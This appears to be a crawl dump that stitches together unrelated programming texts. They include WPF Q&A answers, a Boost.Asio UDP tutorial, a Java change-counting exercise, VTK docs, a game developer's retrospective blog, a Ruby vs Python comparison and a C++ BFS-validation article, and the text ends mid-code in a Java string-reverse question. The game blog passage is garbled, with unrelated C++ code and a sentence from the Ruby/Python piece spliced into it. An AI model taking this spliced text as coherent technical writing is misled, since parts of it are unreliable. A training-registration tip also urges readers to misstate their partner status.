        </Style.Resources>
      </Style>
    </SomeElement1.Style>
    <SomeElement1.Template>
      <ControlTemplate>
        <SomeElement1_1 SomeProperty="{DynamicResource blah}" />
      </ControlTemplate>
    </SomeElement1.Template>
  </SomeElement1>
  <ControlTemplate.Triggers>
    <Trigger Property="AnotherProperty" Value="anotherValue">
      <Setter Property="Style" TargetName="element1">
        <Setter.Value>
          <Style>
            <Style.Resources>
              <SomeResource2 x:Key="blah" />
            </Style.Resources>
          </Style>
        </Setter.Value>
      </Setter>
    </Trigger>
  </ControlTemplate.Triggers>
</ControlTemplate>

Subject: Creating WPF window prevents application from closing

Window window = new Window();

Putting this line anywhere in my WPF application without actually using this window variable prevents my application from closing when I hit the main window close button. Why would creating an instance of Window have this effect? Only if I add a subsequent window.Close() call does my application shut down correctly.

Window window = new Window();
window.Close();

Answer: If you do Application.Current.Shutdown() your app should close. I assume you're doing Application.Current.MainWindow.Close(). There's a property on Application called ShutdownMode. The default is OnLastWindowClose. Since you've created a window and not closed it, your app will never shut down. You can change Application.ShutdownMode to OnMainWindowClose, and you should be fine.

Subject: Coerced value not reflected in control or others bound to it as sources

I have the following xaml. The CustomTextBox overrides metadata for the Text Dependency Property, which calls a coerce method, which upshifts whatever the user enters. However, the upshifted value does not show up in either TextBox. If I move the binding to the 2nd text box, so it binds to the first, it will display the upshifted text correctly.
Why is the upshifted string not showing up in the original case (i.e. as below)?

<StackPanel Margin="20" VerticalAlignment="Center">
  <Label Content="Target TextBox (with coercion to uppercase)"/>
  <src:CustomTextBox x:Name="TargetTextBox" Text="{Binding ElementName=SourceTextBox, Path=Text, Mode=TwoWay, UpdateSourceTrigger=PropertyChanged}" Margin="0,0,0,20"/>
  <Label Content="Source TextBox"/>
  <TextBox x:Name="SourceTextBox" IsReadOnly="True" Background="LightGray"/>
</StackPanel>

Answer: Here's a bit of background on coercion. The classic case of coercion is the Slider control, where the Value property's value needs to always lie between the MaxValue and the MinValue. So in this regard we envisioned coercion to be a view concept. Hence we made a design decision not to propagate coerced values through data Binding. Thus the fact that you don't see a coerced value on CustomTextBox.Text propagate through the Binding back to the source is 'By Design'. Yes, it can be argued that when Binding is used in the way you've shown below to bind two UI pieces, then one would want to propagate the coerced value through the Binding. Sam Bent (our Data Services guru) has some thoughts on building some configuration parameters on Binding to allow this. However, none of that exists in the platform as of today.

As for a Binding on a regular TextBox.Text property displaying the upshifted Text, the reason is that the value at the source is transferred as is to the target of a Binding. The special rule about coercion only comes into play when the value at the target is being coerced.

Subject: Creating Bindings in a Data Template

I'm trying to create a DataTemplate where some non-FE objects bind to the DataContext of the DataTemplate. My XAML looks something like this:
<DataTemplate DataType="{x:Type api:SeahorseItem}">
  <Button CommandParameter="{Binding RelativeSource={RelativeSource Self}}">
    <con:DoubleClickButton.Command>
      <con:MetaCommand ...>
        <con:MetaCommandEntry ... />
        <con:MetaCommandEntry ... />
        <con:MetaCommandEntry ... />
      </con:MetaCommand>
    </con:DoubleClickButton.Command>
  </Button>
</DataTemplate>

When I run my application I get the following error message:

System.Windows.Data Error: 2 : Cannot find governing FrameworkElement or FrameworkContentElement for target element. BindingExpression:(no path); DataItem=null; target element is 'MetaCommandEntry' (HashCode=51095287); target property is 'CommandParameter' (type 'Object')

When I actually debug this, the CommandParameters on my entries and the command itself are null. I've done some digging, and it seems that my problem is that my objects are not FEs, and as a result not part of the inheritance tree. I also saw a neat trick that allows me to make my objects a part of the inheritance tree by making them freezables. This worked for the MetaCommand, allowing its binding to work. But the Entries still evaluate to null.

Answer: Could you make the collection property that holds on to the MetaCommandEntries be of type FreezableCollection<MetaCommandEntry>, and MetaCommandEntry should also subclass Freezable. The reason for these changes is that InheritanceContext is internal to the framework, and Freezable and FreezableCollection are the only two non-FE/FCE public classes that support it.

Subject: DataGrid different template for new row problem

I'm trying to show a different template for the last row of my DataGrid, to show not the default row template but a line of text, say "Click here to add new item". I came across this blog. I improved it a little bit by listening to the InitializingNewItem event and saved the Dispatcher trick. But I still need to listen to several events and use VisualTreeHelper to set the focus on the first cell of the last row. I wonder if there is an easier way to do this in general.
I believe this is a very common scenario.

Answer: We hear you. We will look to make this scenario easier in a future release. But what you see in the blog is what we have today.

Subject: Font change events?

I need to detect when the font setting for a specific element in my FlowDocument changes, either because its (local) font property or its container's property (inheritable) changes. Is it possible? (I do not see an event that looks that way; I need to change some other properties because of the font change). Alternatively, is there any way for me to detect that the document is about to re-render and do these mods then?

Answer: You could try DependencyPropertyDescriptor.AddValueChanged. The dependency property would be TextElement.FontSizeProperty.

Subject: How to display 1st underscore in Label?

I would like to display the 1st underscore "_" in a Label. I know the 1st "_" means a keyboard shortcut, but I don't want the shortcut; I want to display the underscore. How do I escape "_" so it is not treated as a shortcut?

Obvious Answer: Try a double "_" as in the markup below.

<Label Content="__Label"/>

Follow-up: Yes, I did, but I have to add an extra underscore to every underscore, such as A__B__C__D instead of A_B_C_D.

Next answer: The simplest solution would be to use TextBlock instead of Label. Otherwise, you could re-template Label to change RecognizesAccessKey to false:

<ControlTemplate TargetType="{x:Type Label}">
  <Border ...>
    <ContentPresenter ... />
  </Border>
  ...
</ControlTemplate>

Subject: Is there any easy way to get the size of an ImageSource?

I'm implementing a cache for ImageSource. I was looking at the documentation but I could not find an easy way to get the Size (in bytes) of an ImageSource. Is there an easy way to do that?

Answer: A size property doesn't make sense for all implementers of ImageSource. The two platform ones (according to MSDN) are DrawingImage and BitmapSource. DrawingImage is specified in XAML, so its size would not be representative of a pixel width x height x depth measure in bytes.
Take a look at the ImageSource documentation and inheritance tree. You can get a size for the pixels of a BitmapSource using PixelWidth, PixelHeight, and Format.BitsPerPixel. Obviously the object itself can store some more information depending on the implementation. So I think you might want to implement a cache for the BitmapSource class rather than ImageSource.

Subject: Closest to immediate-mode rendering in WPF

What is the closest I can get to immediate-mode rendering in WPF? Right now I'm overriding OnRender and basically re-populating the DrawingContext on every frame (since a physics engine is involved, everything moves). Is that the best way? Also, I noticed that there is no way to apply pixel shaders in the DrawingContext like we can do in XNA. Is there any (potentially hacky) way to push a pixel shader into DrawingContext? Seems odd that we can push bitmap effects but not hardware accelerated effects.

Answer: That's as close as it gets. Not sure if it matters to you, since you're changing everything every frame, but it's probably worth noting that the dirty region logic operates at the Visual level. Which is to say, if you draw everything in 1 DrawingContext, you get no dirty subregion support for all that content.

Having said that, what exactly is changing in your scene? If things are moving/rotating while maintaining a rigid shape, it might make more sense to draw everything once, then simply update the transforms every frame with the physics engine inputs. This is much more "WPFy", and if it fits within the constraints of your system, it should also be more efficient than changing the DC content every frame.

No way to push an effect in a DC. The method of drawing you're using is not really the one for which WPF is optimized. Bitmap effects are going away. If you pick up a 4.0 beta build, they're already gone.
Subject: Making one color in a bitmap transparent

I'm fairly new at WPF, so if there is an obvious answer to this question, it's likely the right one. I'm trying to convert some old WinForms code to WPF and I'm running into a snag displaying Bitmap images. All of the bitmaps in my application have the same background color, which is intended to be displayed as transparent. In WinForms I could achieve this effect by creating an ImageList and setting the TransparentColor property to be this particular color. How can I achieve the same effect with WPF?

Answers: There's no default support in WPF to do this. However, Dwayne has blogged about how to do this. If you have a small number of bitmaps, it's probably easier to make them transparent yourself in a photo editing app and save as PNG.

Date, Location, and Logistics

Location           Dates
Los Angeles, CA    4/24-4/25
London, UK         5/15-5/16
New York, NY       5/29-5/30
Chicago, IL        6/12-6/13
Phoenix, AZ        6/5-6/6

Registration tips: If you are not a partner or don't know if you are: When asked "are you registered" select No. Select "Visiting partner" under Partner Level. Get creative on the Partner Type; if in doubt, we are all "System builders".

Format: Instructor-led training from 9 AM to 5:30 PM. 15-minute breaks every couple of hours. 45 minutes lunch around mid-day.

Food: Breakfast, lunch and afternoon snacks are provided.

Detailed Agenda.
http://blogs.msdn.com/b/jaimer/archive/2009/04.aspx
Hello *,

I was writing an assert() stmt when I realized the following (see code). Can anyone explain why/how? My final aim is to be able to write an assert stmt for verifying that my function (a demo function) works fine. I heard from someone that there are special assert macros/comparison operators for floating point arithmetic. Is it true?

#include <iostream>
using namespace std;

int main()
{
    double a = 2.2, b = 1234.5678;
    double c = a * b;

    // according to windows' calc.exe 2.2 * 1234.5678 = 2716.04916
    // which of course is correct if you multiply manually
    if( 2716.04916 == c )
        cout << "Calc.exe and C++ give same results" << endl;
    else
        cout << "Calc.exe gives 2716.04916 and C++ gives " << c << endl;

    // so we know that assert( 2716.04916 == c ) will fail for sure.
    return 0;
}

When I run the code (compiled and run on VC 6.0) this is the output I get:

------------------------------------------------------------------
Calc.exe gives 2716.04916 and C++ gives 2716.05
Press any key to continue
------------------------------------------------------------------
https://www.daniweb.com/programming/software-development/threads/73810/floating-point-multiplication-precision-issues
...one of the most highly regarded and expertly designed C++ library projects in the world. — Herb Sutter and Andrei Alexandrescu, C++ Coding Standards

This tutorial program shows how to use asio to implement a client application with UDP.

#include <iostream>
#include <boost/array.hpp>
#include <boost/asio.hpp>

using boost::asio::ip::udp;

The start of the application is essentially the same as for the TCP daytime client.

int main(int argc, char* argv[])
{
  try
  {
    if (argc != 2)
    {
      std::cerr << "Usage: client <host>" << std::endl;
      return 1;
    }

    boost::asio::io_service io_service;

We use an ip::udp::resolver object to find the correct remote endpoint to use based on the host and service names. The query is restricted to return only IPv4 endpoints by the ip::udp::v4() argument.

    udp::resolver resolver(io_service);
    udp::resolver::query query(udp::v4(), argv[1], "daytime");

The ip::udp::resolver::resolve() function is guaranteed to return at least one endpoint in the list if it does not fail. This means it is safe to dereference the return value directly.

    udp::endpoint receiver_endpoint = *resolver.resolve(query);

Since UDP is datagram-oriented, we will not be using a stream socket. Create an ip::udp::socket and initiate contact with the remote endpoint.

    udp::socket socket(io_service);
    socket.open(udp::v4());

    boost::array<char, 1> send_buf = { 0 };
    socket.send_to(boost::asio::buffer(send_buf), receiver_endpoint);

Now we need to be ready to accept whatever the server sends back to us. The endpoint on our side that receives the server's response will be initialised by ip::udp::socket::receive_from().

    boost::array<char, 128> recv_buf;
    udp::endpoint sender_endpoint;
    size_t len = socket.receive_from(
        boost::asio::buffer(recv_buf), sender_endpoint);

    std::cout.write(recv_buf.data(), len);
  }

Finally, handle any exceptions that may have been thrown.
  catch (std::exception& e)
  {
    std::cerr << e.what() << std::endl;
  }

  return 0;
}

See the full source listing

Return to the tutorial index

Previous: Daytime.3 - An asynchronous TCP daytime server

Next: Daytime.5 - A synchronous UDP daytime server
http://www.boost.org/doc/libs/1_45_0/doc/html/boost_asio/tutorial/tutdaytime4.html
I need the output to look like this:

Enter the amount of the purchases: (user enters 44.28)
Enter the cash tendered: (user enters 50)
Your change is equal to 5.71999999999 which is...
5 dollars
72 cents
2 quarter(s)
2 dime(s)
0 nickel(s)
2 pennie(s)

-----------------------------------------------------------

As you can see, the basic idea of the program is to inform the user how much of each coin they get back with their change... if anyone can help me it would be a huge help!

package lab02;

/**
 * Purpose: Compute the amount of change a customer should receive (in terms
 * of dollars, quarters, dimes, nickels, and pennies) given the amount of the
 * purchase and the cash tendered.
 * @author jdoe
 */

import java.util.Scanner;

public class Change {

    /**
     * @param args
     */
    public static void main(String[] args) {
        double purchaseAmt;
        double cashTendered;
        double totalChange;
        int dollars, cents;

        // Create a Scanner object to read from standard input
        Scanner scan = new Scanner(System.in);

        // Prompt the user and read in amount of purchase and
        // cash tendered.
        System.out.print("Enter the amount of the purchase: ");
        purchaseAmt = scan.nextDouble();
        System.out.print("Enter the cash tendered: ");
        cashTendered = scan.nextDouble();

        totalChange = cashTendered - purchaseAmt;
        dollars = (int) totalChange;

        System.out.println();
        System.out.println("Your change is $" + totalChange + " which is ...");
        System.out.println(dollars + " dollars");
        System.out.println();
    }
}
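One way to finish the program is to convert the change to a whole number of cents first (which also avoids the 5.71999999999 artifact in the output) and then peel off each denomination with integer division and remainder. The class and method names below are just one possible sketch, not part of the assignment code:

```java
public class CoinBreakdown {

    // Splits a change amount given in whole cents into
    // {dollars, quarters, dimes, nickels, pennies}.
    public static int[] breakdown(int cents) {
        int[] counts = new int[5];
        counts[0] = cents / 100;  cents %= 100;  // dollars
        counts[1] = cents / 25;   cents %= 25;   // quarters
        counts[2] = cents / 10;   cents %= 10;   // dimes
        counts[3] = cents / 5;    cents %= 5;    // nickels
        counts[4] = cents;                       // pennies
        return counts;
    }

    public static void main(String[] args) {
        double purchaseAmt = 44.28, cashTendered = 50.0;

        // Round to cents exactly once, then work in integers only.
        int cents = (int) Math.round((cashTendered - purchaseAmt) * 100);

        int[] c = breakdown(cents);
        System.out.println(c[0] + " dollars");
        System.out.println(c[1] + " quarter(s)");
        System.out.println(c[2] + " dime(s)");
        System.out.println(c[3] + " nickel(s)");
        System.out.println(c[4] + " pennie(s)");
    }
}
```

For the 5.72 in the example this prints 5 dollars, 2 quarters, 2 dimes, 0 nickels, and 2 pennies, matching the desired output.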
http://www.javaprogrammingforums.com/object-oriented-programming/5325-new-so-lost-trying-learn.html
Read a CML file and output a vtkMolecule object.

#include <vtkCMLMoleculeReader.h>

Read a CML file and output a vtkMolecule object.

Definition at line 30 of file vtkCMLMoleculeReader.h.

Definition at line 34 of file vtkCMLMoleculeReader.h.

Methods invoked by print to print information about the object including superclasses. Typically not called by the user (use Print() instead) but used in the hierarchical print process to combine the output of several classes. Reimplemented from vtkMoleculeAlgorithm.

Get/Set the output (vtkMolecule) that the reader will fill.

Get/Set the name of the CML file.

This is called by the superclass. This is the method you should override. Reimplemented from vtkMoleculeAlgorithm.

Fill the output port information objects for this algorithm. This is invoked by the first call to GetOutputPortInformation for each port so subclasses can specify what they can handle. Reimplemented from vtkMoleculeAlgorithm.

Definition at line 60 of file vtkCMLMoleculeReader.h.
https://vtk.org/doc/nightly/html/classvtkCMLMoleculeReader.html
Alone on a Friday night, in need of some inspiration, you decide to relive some of your past programming conquests. The old archive hard drive slowly spins up, and the source code of the glory days scrolls by...

Oh no. This is not at all what you expected. Were things really this bad? Why did no one tell you? Why were you like this? Is it even possible to have that many gotos in a single function? You quickly close the project. For a brief second, you consider deleting it and scrubbing the hard drive.

What follows is a compilation of lessons, snippets, and words of warning salvaged from my own excursion into the past. Names have not been changed, to expose the guilty.

2004

I was thirteen. The project was called Red Moon -- a wildly ambitious third-person jet combat game. The few bits of code that were not copied verbatim out of Developing Games in Java were patently atrocious. Let's look at an example. I wanted to give the player multiple weapons to switch between. The plan was to rotate the weapon model down inside the player model, swap it out for the next weapon, then rotate it back. Here's the animation code. Don't think about it too hard.

public void updateAnimation(long eTime) {
    if(group.getGroup("gun") == null) {
        group.addGroup((PolygonGroup)gun.clone());
    }
    changeTime -= eTime;
    if(changing && changeTime <= 0) {
        ...

All of this state boils down to two variables: weaponSwitchTimer and weaponCurrent. Everything else can be derived from those two variables.

Explicitly initialize everything. This function checks if the weapon is null and initializes it if necessary. Thirty seconds of contemplation would reveal that the player always has a weapon in this game, and if they don't, the game is unplayable and might as well crash anyway.
Clearly, at some point, I encountered a NullPointerException in this function, and instead of thinking about why it happened, I threw in a quick null check, which resulted in monstrosities like this:

class Mesh {
public:
    static std::list<Material*>* GetMaterials(); // Gets the list of materials in this mesh
protected:
    ID3DXMesh* d3dmesh; // Actual mesh data
    LPCSTR filename; // Mesh file name; used for caching
    DWORD numSubsets; // Number of subsets (materials) in the mesh
    std::vector<Material*> materials; // List of materials; loaded from X file
    ...
};

The canonical example of data binding: a text field, a label element, and a single line of code that inextricably binds the two together. Type in the text field, and pow! The label magically updates. In the context of a game, it looks something like this:

public class Player
{
    public Property<string> Name = new Property<string> { Value = "Ryu" };
}

public class TextElement : UIComponent
{
    public Property<string> Text = new Property<string> { Value = "" };
}

label.add(new Binding<string>(label.Text, player.Name));

This is a fundamental feature of modern scripting languages... no, wait, it was supposed to be the best of both worlds, and the Property class looked like this:

public class Property<Type> : IProperty
{
    protected Type _value;
    protected List<IPropertyBinding> bindings;
    public Type Value
    {
        get { return this._value; }
        set
        {
            this._value = value;
            for (int i = this.bindings.Count - 1; i >= 0; i = Math.Min(this.bindings.Count - 1, i - 1))
                this.bindings[i].OnChanged(this);
        }
    }
}

Every single field in the game, down to the last boolean, had an unwieldy dynamically allocated array attached to it. Take a look at the loop that notifies the bindings of a property change to get an idea of the issues I ran into with this paradigm. It has to iterate through the binding list backward, since a binding could actually add or delete UI elements, causing the binding list to change. Still, I loved data binding so much that I built the entire game on top of it. Things quickly got out of hand.
jump.Add(new Binding<Vector3>(transform.Position, rollKickSlide.Position));
rollKickSlide.Predictor = predictor;
rollKickSlide.Bind(model);
rollKickSlide.VoxelTools = voxelTools;
rollKickSlide.Add(new CommandBinding(rollKickSlide.DeactivateWallRun, (Action)wallRun.Deactivate));
rollKickSlide.Add(new CommandBinding(rollKickSlide.Footstep, footsteps.Footstep));

I ran into tons of problems. I created binding cycles that caused infinite loops. I found out that initialization order is often important, and initialization is a nightmare with data binding, with some properties getting initialized multiple times as bindings are added. When it came time to add animation, I found that data binding made it difficult and non-intuitive to animate between two states. And this isn't just me. Watch this Netflix talk which gushes about how great React is before explaining how they have to turn it off any time they run an animation.

I too realized the power of turning a binding on or off, so I added a new field:

class Binding
{
    public bool Enabled;
}

Unfortunately, this defeated the purpose of data binding. I wanted to get rid of UI state, and this code actually added some. How can I eliminate this state? I know! Data binding!

class Binding
{
    public Property<bool> Enabled = new Property<bool> { Value = true };
}

Yes, I really did try this briefly. It was bindings all the way down. I soon realized how crazy it was.

How can we improve on data binding? Try making your UI actually functional and stateless. dear imgui is a great example of this. Separate behavior and state as much as possible. Avoid techniques that make it easy to create state. It should be a pain for you to create state.

Conclusion. Here's the takeaway:

- Make decisions upfront instead of lazily leaving them to the computer.
- Separate behavior and state.
- Write pure functions.
- Write the client code first.
- Write boring code.

That's my story. What horrors from your past are you willing to share?
https://www.gamedev.net/blogs/blog/832-etodd-makes-games/?m=1&y=2013
What does Ruby have that Python doesn't, and vice versa?

Python Example

Functions are first-class variables in Python. You can declare a function, pass it around as an object, and overwrite it:

def func():
    print "hello"

def another_func(f):
    f()

another_func(func)

def func2():
    print "goodbye"

func = func2

This is a fundamental feature of modern scripting languages. JavaScript and Lua do this, too. Ruby doesn't treat functions this way; naming a function calls it. Of course, there are ways to do these things in Ruby, but they're not first-class operations. For example, you can wrap a function with Proc.new to treat it as a variable--but then it's no longer a function; it's an object with a "call" method.

Ruby's functions aren't first-class objects

Ruby functions aren't first-class objects. Functions must be wrapped in an object to pass them around; the resulting object can't be treated like a function. Functions can't be assigned in a first-class manner; instead, a function in its container object must be called to modify them.

def func; p "Hello" end
def another_func(f); method(f)[] end

another_func(:func) # => "Hello"

def func2; print "Goodbye!" end

self.class.send(:define_method, :func, method(:func2))

func # => "Goodbye!"
method(:func).owner # => Object
func # => "Goodbye!"
self.func # => "Goodbye!"

Ultimately all answers are going to be subjective at some level, and the answers posted so far pretty much prove that you can't point to any one feature that isn't doable in the other language in an equally nice (if not similar) way, since both languages are very concise and expressive.

I like Python's syntax. However, you have to dig a bit deeper than syntax to find the true beauty of Ruby. There is zenlike beauty in Ruby's consistency. While no trivial example can possibly explain this completely, I'll try to come up with one here just to explain what I mean.
Reverse the words in this string:

sentence = "backwards is sentence This"

When you think about how you would do it, you'd do the following:

- Split the sentence up into words
- Reverse the words
- Re-join the words back into a string

In Ruby, you'd do this:

sentence.split.reverse.join ' '

Exactly as you think about it, in the same sequence, one method call after another. In Python, it would look more like this:

" ".join(reversed(sentence.split()))

It's not hard to understand, but it doesn't quite have the same flow. The subject (sentence) is buried in the middle. The operations are a mix of functions and object methods. This is a trivial example, but one discovers many different examples when really working with and understanding Ruby, especially on non-trivial tasks.
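For what it's worth, the two one-liners really do compute the same thing, as a quick check confirms (Python 3 shown here, where print is a function):

```python
sentence = "backwards is sentence This"

# Split into words, reverse the word list, and join back with spaces,
# mirroring the three steps listed above.
result = " ".join(reversed(sentence.split()))
print(result)
```

The difference discussed is purely one of reading order: Ruby's chain reads left to right from the subject, while Python's version nests the same three operations inside out.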
https://codehunter.cc/a/python/what-does-ruby-have-that-python-doesnt-and-vice-versa
Check if the given permutation is a valid BFS of a given tree

Introduction

Breadth-First Search (or BFS) is an essential level-based graph traversal algorithm that can be used to solve several problems based on the simple concepts of graphs. These include finding the shortest path in a graph and solving puzzle games like Rubik's Cubes. This blog will discuss one such problem that will utilize this concept of BFS. Let us first understand the problem before jumping onto the solution.

Problem Statement

You have been given a tree having N nodes, numbered from 1 to N. You have also been given a permutation array, i.e., an array containing all elements from 1 to N in a specific order. Your task is to check if this given permutation can be obtained by performing BFS traversal on the given tree. Also, note that the traversal will always start from 1.

Let's look at an easy example to gain a clear picture of the problem:

Example

Edges of the tree given: (1, 2), (2, 3)
A = {1, 2, 3}

The given permutation is a valid BFS of the tree that has been given.

Approach

- One thing that needs to be kept in mind is that while performing BFS traversal on a tree, all the neighbors of the current node are visited and their children are pushed into the queue in an ordered manner. This process is repeated until the queue becomes empty.
- Assume that the root has two children, A and B. We have the option of visiting any of them first. Let's say we go to A first, but now we'll have to push the children of A to the front of the queue, and we won't be able to visit the children of B before A's.
- So, although we can visit the children of one node in any order, the order in which the children of two different nodes should be visited is fixed, i.e., if A is visited before B, then all of A's children should be visited before all of B's children. We will use this concept to solve the problem given here.

Algorithm

- We will start with an empty queue of sets.
- In each set, we will push the children of a specific node while traversing the permutation.
- We will proceed if the current element of the permutation is found in the set at the top of the queue; else, we will return false.

Implementation

Program

// C++ program to check if the given permutation is a valid BFS of a given tree.
#include <iostream>
#include <vector>
#include <queue>
#include <unordered_set>
#include <unordered_map>
using namespace std;

// Function to check if the given permutation is a valid BFS of a given tree.
bool isValidBFS(vector<int> &bfs, unordered_map<int, vector<int>> &tree)
{
    // If the first element of 'BFS' is not present in the tree, return false.
    if (tree.count(bfs[0]) == 0) {
        return false;
    }

    // Number of nodes in the tree.
    int n = bfs.size();

    // 'VISITED' hash set to keep track of visited nodes.
    unordered_set<int> visited;

    // 'LEVEL' hash set to keep track of nodes at each level.
    unordered_set<int> level;

    // Inserting the root node.
    level.insert(bfs[0]);

    // Queue for the BFS traversal.
    queue<unordered_set<int>> q;

    // Inserting the root level in front of the queue.
    q.push(level);

    // Variable to iterate over the 'BFS' array.
    int i = 0;

    while (!q.empty() && i < n) {
        // In case the current node has already been visited, return false.
        if (visited.count(bfs[i])) {
            return false;
        }
        visited.insert(bfs[i]);

        // If all the child nodes of the previous nodes have been visited,
        // pop the front element of the queue.
        if (q.front().empty()) {
            q.pop();
        }

        // Return false if the current element of the permutation cannot be
        // found in the set at the top of the queue.
        level = q.front();
        if (level.count(bfs[i]) == 0) {
            return false;
        }
        level.clear();

        // All the unvisited children of the current node are pushed into the
        // 'LEVEL' hash set, and then this hash set is pushed into the queue.
        for (int &j : tree[bfs[i]]) {
            if (!visited.count(j)) {
                level.insert(j);
            }
        }
        if (level.empty() == false) {
            q.push(level);
        }

        // The current node is erased from the set at the top of the queue.
        q.front().erase(bfs[i]);

        // The index of the permutation is incremented.
        i++;
    }
    return true;
}

int main()
{
    // Given adjacency list representation of the tree.
    unordered_map<int, vector<int>> tree;
    tree[3].push_back(7);
    tree[7].push_back(3);
    tree[3].push_back(2);
    tree[2].push_back(3);
    tree[2].push_back(8);
    tree[8].push_back(2);
    tree[2].push_back(13);
    tree[13].push_back(2);
    tree[8].push_back(14);
    tree[14].push_back(8);
    tree[13].push_back(4);
    tree[4].push_back(13);

    // BFS permutation.
    vector<int> bfs = {3, 2, 7, 13, 8, 14, 4};

    // Calling the function and checking whether the given permutation is a valid BFS of the given tree.
    if (isValidBFS(bfs, tree))
        cout << "Yes, the given permutation is a valid BFS of a given tree." << endl;
    else
        cout << "No, the given permutation is not a valid BFS of a given tree." << endl;

    return 0;
}

Output

No, the given permutation is not a valid BFS of a given tree.

Time Complexity

The time complexity is O(N), where N is the total number of nodes in the given tree. We traverse all N nodes using the while loop, and at every step we do a constant amount of work, so the time complexity is O(1 * N) = O(N).

Space Complexity

The space complexity is O(N), where N is the total number of nodes in the given tree. Extra space is used for the hash sets, the hash map, and the queue, each of which consumes O(N) space.

Key Takeaways

So, this blog discussed the problem: check if the given permutation is a valid BFS of a given tree. Head over to CodeStudio to practice problems on topics like Graphs and Trees and crack your interviews like a Ninja! Practicing a bunch of questions is not enough in this competitive world, so go check where you stand among your peers by taking our mock tests and see which areas need improvement. Feel free to post any suggestions in the comments section.
https://www.codingninjas.com/codestudio/library/check-if-the-given-permutation-is-a-valid-bfs-of-a-given-tree
CC-MAIN-2022-27
refinedweb
1,043
72.76
Alex Pol
Ranch Hand, 33 posts, 15 threads started, member since Sep 29, 2006

Recent posts by Alex Pol

OCMJEA - 5 or 6?
I see on the Oracle website that currently they offer certification for JEE5 (OCMJEA). Is it worth it? If I start preparing for JEE5 and they eliminate it when introducing the certification for JEE6, this will mean I have lost a bit of time. Please advise.
(5 years ago, in Architect Certification (OCMJEA))

OCPJWSD vs OCEJWSD
Hello, please tell me what's the difference between these two exams? One is "professional" and one is "expert"... which one should I take? I saw that one is JEE5 and the other one JEE6, but what's with the different naming? Thanks
(5 years ago, in Web Services Certification (OCEJWSD))

passed OCMJEA
Congratulations! Please share your experience: how did you train, what did you read, etc.
(5 years ago, in Certification Results)

From experience - books and other training materials
Thank you, Jeanne. I looked through your links, they provide a very useful reference. Any other impressions are welcome.
(5 years ago, in Architect Certification (OCMJEA))

From experience - books and other training materials
Hello, I already am SCJP, SCBCD, SCWCD. I've been working in J2EE for quite a few years now, reading some materials and doing a few J2EE designs here and there, and I feel like it's time to move forward and try the SCEA/OCMJEA. Of course, some formal preparation will be needed first. I know there is an entire list of books in the "FAQ" section, but I'm pretty sure nobody can go through ALL those books. At least not somebody with a job. So what I'm interested in is: what should I read, what is really necessary from that list? I'm expecting there is no silver bullet, but your experience would be a lot of help to me. From what I noticed around here, Cade/Sheil is highly recommended, and also Fowler's "UML Distilled". I have already read Sierra/Bates's EJB 3 book (for my SCBCD exam). Any other recommendations? Thanks to all in anticipation!
(5 years ago, in Architect Certification (OCMJEA))

Upgrade certification from 1.4 to 6
Hello, I have a few questions:
1. Can I take the upgrade exam for Java 6 (CX-310-066) if I have the Java 1.4 SCJP?
2. Maybe it's better if I take the SCJP6 exam (CX-310-065) directly? Their cost is the same.
3. Will the upgrade exam contain only things introduced in Java 5 and Java 6? Or only things introduced in Java 6? Or...?
4. Which books should I use to prepare for the upgrade exam? What about for the CX-310-065?
Thank you.
(7 years ago, in Programmer Certification (OCPJP))

html-el:checkbox readonly?
Hi, how can I make a html-el:checkbox readonly? I cannot make it "disabled" because like this it's not read from the form. Thanks.
(8 years ago, in Struts)

Enthuware (RegSoft) fraud?
Hello all, I purchased the software from Enthuware for the SCBCD 5 exam, and in addition to the 35$ the exam cost (30$ + taxes) I also got robbed of an additional 12$ which stays blocked on my visa card. Why do the 12$ stay blocked on my card??
(8 years ago, in EJB Certification (OCEEJBD))

Sorting problem
I have a map in which the key is a customerId (a String), and the value is a collection of objects of type T, which have an attribute BigDecimal "value" and another attribute String "manufacturer" which can take 2 values: "manuf1" and "manuf2". I want to obtain the top 10 customers, and to display for each the total "value", the value for manuf1 and the value for manuf2 (these are sums, of course). Any ideas are appreciated. Thanks
(9 years ago, in Beginning Java)

I get ServletException from a very simple html form
In what log? At the console I don't have a log.
(9 years ago, in Struts)

I get ServletException from a very simple html form
Doesn't work with a slash, I get:
type Status report
message /xlsImportAction.do
description The requested resource (/xlsImportAction.do) is not available.
(9 years ago, in Struts)

I get ServletException from a very simple html form
Hello all, I have this html page:

<html>
<body>
<form method="POST" enctype="multipart/form-data" action="xlsImportAction.do">
    Select Excel file:<br/><input type="file" name="upfile"/>
    <input type="submit" value="Import"/>
</form>
</body>
</html>

this action in struts:

<action path="/xlsImportAction"
        name="xlsImportForm"
        type="com.rolandberger.analytics.web.actions.XLSImportAction"
        scope="session" />

this form:

import org.apache.struts.action.ActionForm;
import org.apache.struts.upload.FormFile;

/**
 * Contains the path of the file we want to import
 * @version 1.0
 * @created 22-September-2008
 */
public class XLSImportForm extends ActionForm {

    private FormFile upfile;

    public FormFile getUpfile() {
        return upfile;
    }

    public void setUpfile(FormFile upfile) {
        this.upfile = upfile;
    }
}

and this action:

public class XLSImportAction extends Action {
    /**
     * The logger used in this class.
     */
    private static Log log = LogFactory.getLog(XLSImportAction.class);

    public ActionForward execute(
            ActionMapping mapping,
            ActionForm form,
            HttpServletRequest request,
            HttpServletResponse response) throws Exception {
        if (log.isInfoEnabled()) {
            log.info("");
        }
        return mapping.findForward("doesntmatter");
    }
}

And it doesn't work. It doesn't enter my action, I get:

javax.servlet.ServletException: Servlet execution threw an exception
org.apache.catalina.core.ApplicationFilterChain.internalDoFilter (292)
org.apache.catalina.core.ApplicationFilterChain.doFilter (188)
org.apache.catalina.core.StandardWrapperValve.invoke (213)
org.apache.catalina.core.StandardContextValve.invoke (172)
org.apache.catalina.core.StandardHostValve.invoke (127)
(9 years ago, in Struts)

Yes, I need a Head First EJB 3.0 book!
Bert, let me know when you get out a ME book. Looking forward to it, as I too am interested in this domain. Alex
(10 years ago, in Bunkhouse Porch)

Enthuware BCD 5 Simulator
Mr. Anil, do you make shipments to Romania?
(10 years ago, in EJB Certification (OCEEJBD))

Passed SCWCD with 89%
HFSJ, a bit of Mikalai's notes, and the Whizlabs exam simulator. That's all, folks
(10 years ago, in Certification Results)
https://coderanch.com/u/135131/Alex-Pol
CC-MAIN-2018-09
refinedweb
1,199
55.34
I have a String in my program. I need to reverse this String and save it. How can I reverse a String in Java? Explain with an example.

The StringBuffer class of the java.lang package provides a reverse() method. This method returns the reverse of the sequence of characters in the current buffer. Using this method you can reverse a string in Java.

import java.lang.*;

public class StringBufferDemo {
   public static void main(String[] args) {
      StringBuffer buff = new StringBuffer("tutorials point");
      System.out.println("buffer = " + buff);

      // reverse characters of the buffer and print it
